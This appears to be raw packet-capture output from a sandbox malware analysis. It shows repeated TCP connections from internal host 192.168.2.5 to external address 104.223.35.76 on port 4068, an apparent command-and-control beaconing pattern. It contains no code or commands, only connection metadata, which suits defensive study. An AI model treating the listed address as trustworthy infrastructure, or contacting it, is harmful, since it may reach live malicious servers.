                              Oct 31, 2024 10:32:26.737984896 CET500044068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:26.739319086 CET500054068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:26.742888927 CET406850004104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:26.744338036 CET406850005104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:26.747828007 CET500054068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:26.758675098 CET500054068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:26.763820887 CET406850005104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:27.345829010 CET406850005104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:27.345980883 CET500054068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:27.628493071 CET500054068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:27.629754066 CET500064068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:27.633397102 CET406850005104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:27.634656906 CET406850006104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:27.634798050 CET500064068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:27.644771099 CET500064068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:27.649696112 CET406850006104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:28.220573902 CET406850006104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:28.221801043 CET500064068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:28.378752947 CET500064068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:28.381617069 CET500074068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:28.383718967 CET406850006104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:28.386511087 CET406850007104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:28.386586905 CET500074068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:28.406347990 CET500074068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:28.411454916 CET406850007104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:28.966406107 CET406850007104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:28.966489077 CET500074068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:29.284688950 CET500074068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:29.286128998 CET500084068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:29.289649963 CET406850007104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:29.291074038 CET406850008104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:29.291167974 CET500084068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:29.301418066 CET500084068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:29.306282043 CET406850008104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:29.918082952 CET406850008104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:29.921823025 CET500084068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:30.034774065 CET500084068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:30.039864063 CET406850008104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:35.779566050 CET500094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:35.784554958 CET406850009104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:35.784634113 CET500094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:35.815716028 CET500094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:35.822771072 CET406850009104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:35.864797115 CET500094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:35.869658947 CET406850009104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:36.380069017 CET406850009104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:36.385751963 CET500094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:36.661456108 CET500094068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:36.661931992 CET500104068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:36.666465044 CET406850009104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:36.666786909 CET406850010104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:36.666877985 CET500104068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:36.718416929 CET500104068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:36.723325968 CET406850010104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:37.262608051 CET406850010104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:37.262703896 CET500104068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:37.487785101 CET500104068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:37.491667032 CET500114068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:37.494679928 CET406850010104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:37.496664047 CET406850011104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:37.496737003 CET500114068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:37.517736912 CET500114068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:37.522546053 CET406850011104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:38.134949923 CET406850011104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:38.137819052 CET500114068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.253499031 CET500114068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.255532026 CET500124068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.258982897 CET406850011104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:38.260999918 CET406850012104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:38.261104107 CET500124068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.272244930 CET500124068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.277761936 CET406850012104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:38.856389999 CET406850012104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:38.857759953 CET500124068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.909739017 CET500124068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.913733959 CET500134068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.914719105 CET406850012104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:38.919667006 CET406850013104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:38.919755936 CET500134068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.933737040 CET500134068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:38.938745022 CET406850013104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:39.532895088 CET406850013104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:39.532982111 CET500134068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:39.547210932 CET500134068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:39.551331043 CET500144068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:39.553421974 CET406850013104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:39.560600042 CET406850014104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:39.560669899 CET500144068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:39.580538988 CET500144068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:39.585464001 CET406850014104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:39.990746975 CET500144068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:39.995793104 CET406850014104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.153628111 CET406850014104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.153815985 CET500144068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.153888941 CET500144068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.155577898 CET500154068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.158824921 CET406850014104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.160499096 CET406850015104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.160584927 CET500154068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.185684919 CET500154068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.190582037 CET406850015104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.284888983 CET500154068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.289733887 CET406850015104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.691168070 CET500154068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.696014881 CET406850015104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.752414942 CET406850015104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.752593994 CET500154068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.752593994 CET500154068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.754456043 CET500164068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.757498980 CET406850015104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.759325027 CET406850016104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:40.759449959 CET500164068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.829734087 CET500164068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:40.834737062 CET406850016104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:41.356281996 CET406850016104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:41.356353998 CET500164068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:46.144309044 CET500164068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:46.149456024 CET406850016104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:46.156498909 CET500174068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:46.161673069 CET406850017104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:46.161740065 CET500174068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:46.233880043 CET500174068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:46.238770962 CET406850017104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:46.762527943 CET406850017104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:46.764215946 CET500174068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:51.242059946 CET500174068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:51.245143890 CET500184068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:51.247302055 CET406850017104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:51.250044107 CET406850018104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:51.250124931 CET500184068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:51.300350904 CET500184068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:51.305217028 CET406850018104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:51.425770998 CET500184068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:51.430759907 CET406850018104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:51.839653015 CET406850018104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:51.839739084 CET500184068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:56.534775019 CET500184068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:56.536699057 CET500194068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:56.539810896 CET406850018104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:56.541951895 CET406850019104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:56.542095900 CET500194068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:56.763055086 CET500194068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:56.768117905 CET406850019104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:57.135108948 CET406850019104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:57.135206938 CET500194068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.136183977 CET500194068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.137974024 CET500204068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.140995979 CET406850019104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:57.142932892 CET406850020104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:57.143076897 CET500204068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.158147097 CET500204068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.163028955 CET406850020104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:57.916027069 CET406850020104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:57.917218924 CET500204068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.936013937 CET500204068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.937939882 CET500214068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.941771984 CET406850020104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:57.943284035 CET406850021104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:57.943361044 CET500214068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.964349031 CET500214068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:32:57.970010042 CET406850021104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:58.542395115 CET406850021104.223.35.76192.168.2.5
                              Oct 31, 2024 10:32:58.544054031 CET500214068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:03.510998964 CET500214068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:03.515986919 CET406850021104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:03.516421080 CET500224068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:03.521332026 CET406850022104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:03.521408081 CET500224068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:03.634799957 CET500224068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:03.639869928 CET406850022104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:04.121787071 CET406850022104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:04.121896982 CET500224068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:08.738090038 CET500224068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:08.740195036 CET500234068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:08.743017912 CET406850022104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:08.745099068 CET406850023104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:08.745201111 CET500234068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:08.786309958 CET500234068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:08.791265965 CET406850023104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:09.331687927 CET500234068192.168.2.5104.223.35.76
Oct 31, 2024 10:33:09.416040897 CET | 4068 | 50023 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:09.416208029 CET | 50023 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:09.416282892 CET | 50023 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:09.417465925 CET | 4068 | 50023 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:09.419363022 CET | 50024 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:09.421015978 CET | 4068 | 50023 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:09.421051025 CET | 4068 | 50023 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:09.424417019 CET | 4068 | 50024 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:09.424525976 CET | 50024 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:09.527343035 CET | 50024 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:09.535063982 CET | 4068 | 50024 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:10.034059048 CET | 4068 | 50024 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:10.037853956 CET | 50024 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:14.753369093 CET | 50024 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:14.757482052 CET | 50025 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:14.758357048 CET | 4068 | 50024 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:14.762530088 CET | 4068 | 50025 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:14.762741089 CET | 50025 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:14.805119038 CET | 50025 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:14.810373068 CET | 4068 | 50025 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:14.810539007 CET | 50025 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:14.815695047 CET | 4068 | 50025 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:14.894510031 CET | 50025 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:14.899530888 CET | 4068 | 50025 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:15.113147974 CET | 50025 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:15.118215084 CET | 4068 | 50025 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:15.364526033 CET | 4068 | 50025 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:15.367995977 CET | 50025 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:20.050775051 CET | 50025 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:20.052181005 CET | 50026 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:20.055778027 CET | 4068 | 50025 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:20.057069063 CET | 4068 | 50026 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:20.057156086 CET | 50026 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:20.090399027 CET | 50026 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:20.095429897 CET | 4068 | 50026 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:20.180491924 CET | 50026 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:20.185421944 CET | 4068 | 50026 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:20.648204088 CET | 4068 | 50026 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:20.652534962 CET | 50026 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:25.253412008 CET | 50026 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:25.255458117 CET | 50027 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:25.258451939 CET | 4068 | 50026 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:25.260426044 CET | 4068 | 50027 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:25.260503054 CET | 50027 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:25.349006891 CET | 50027 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:25.354113102 CET | 4068 | 50027 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:25.858266115 CET | 4068 | 50027 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:25.858406067 CET | 50027 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:30.722296000 CET | 50027 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:30.725279093 CET | 50028 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:30.727323055 CET | 4068 | 50027 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:30.730834961 CET | 4068 | 50028 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:30.730916977 CET | 50028 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:30.796504974 CET | 50028 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:30.801403046 CET | 4068 | 50028 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:30.912030935 CET | 50028 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:30.916886091 CET | 4068 | 50028 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:31.319730043 CET | 4068 | 50028 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:31.319802046 CET | 50028 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:36.097290993 CET | 50028 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:36.103193045 CET | 4068 | 50028 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:41.060172081 CET | 50029 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:41.065062046 CET | 4068 | 50029 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:41.065155029 CET | 50029 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:41.104331970 CET | 50029 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:41.109421015 CET | 4068 | 50029 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:41.239520073 CET | 50029 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:41.244497061 CET | 4068 | 50029 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:41.512775898 CET | 50029 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:41.518393040 CET | 4068 | 50029 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:41.670473099 CET | 4068 | 50029 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:41.670754910 CET | 50029 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:46.159651995 CET | 50029 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:46.161261082 CET | 50030 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:46.164745092 CET | 4068 | 50029 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:46.166244984 CET | 4068 | 50030 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:46.166337967 CET | 50030 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:46.215532064 CET | 50030 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:46.220545053 CET | 4068 | 50030 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:46.624814987 CET | 50030 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:46.629643917 CET | 4068 | 50030 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:46.745539904 CET | 4068 | 50030 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:46.745604992 CET | 50030 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:51.657653093 CET | 50030 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:51.660214901 CET | 50031 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:51.662616014 CET | 4068 | 50030 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:51.665180922 CET | 4068 | 50031 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:51.665337086 CET | 50031 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:51.722801924 CET | 50031 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:51.727822065 CET | 4068 | 50031 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:52.020148993 CET | 50031 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:52.025448084 CET | 4068 | 50031 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:52.113215923 CET | 50031 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:52.118211985 CET | 4068 | 50031 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:52.253755093 CET | 4068 | 50031 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:52.257868052 CET | 50031 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:52.257953882 CET | 50031 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:52.259294033 CET | 50032 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:52.263463020 CET | 4068 | 50031 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:52.264230013 CET | 4068 | 50032 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:52.264328003 CET | 50032 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:52.299665928 CET | 50032 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:52.304984093 CET | 4068 | 50032 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:52.854731083 CET | 4068 | 50032 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:52.854868889 CET | 50032 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:57.440965891 CET | 50032 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:57.443573952 CET | 50033 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:57.445837021 CET | 4068 | 50032 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:57.448474884 CET | 4068 | 50033 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:57.448559999 CET | 50033 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:57.476763964 CET | 50033 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:57.481709003 CET | 4068 | 50033 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:57.486655951 CET | 50033 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:33:57.491719007 CET | 4068 | 50033 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:58.046257973 CET | 4068 | 50033 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:33:58.047878981 CET | 50033 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:02.690916061 CET | 50033 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:02.694991112 CET | 50034 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:02.695878983 CET | 4068 | 50033 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:02.700952053 CET | 4068 | 50034 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:02.701015949 CET | 50034 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:02.735022068 CET | 50034 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:02.740592003 CET | 4068 | 50034 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:03.296827078 CET | 4068 | 50034 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:03.296885967 CET | 50034 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:03.296988964 CET | 50034 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:03.302038908 CET | 4068 | 50034 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:03.310826063 CET | 50035 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:03.316152096 CET | 4068 | 50035 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:03.316232920 CET | 50035 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:03.356504917 CET | 50035 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:03.361454010 CET | 4068 | 50035 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:03.831753969 CET | 50035 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:03.836736917 CET | 4068 | 50035 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:03.908301115 CET | 4068 | 50035 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:03.908447981 CET | 50035 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:08.599159956 CET | 50035 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:08.602335930 CET | 50036 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:08.604016066 CET | 4068 | 50035 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:08.607232094 CET | 4068 | 50036 | 104.223.35.76 | 192.168.2.5
Oct 31, 2024 10:34:08.607335091 CET | 50036 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:08.631396055 CET | 50036 | 4068 | 192.168.2.5 | 104.223.35.76
Oct 31, 2024 10:34:08.636291027 CET | 4068 | 50036 | 104.223.35.76 | 192.168.2.5
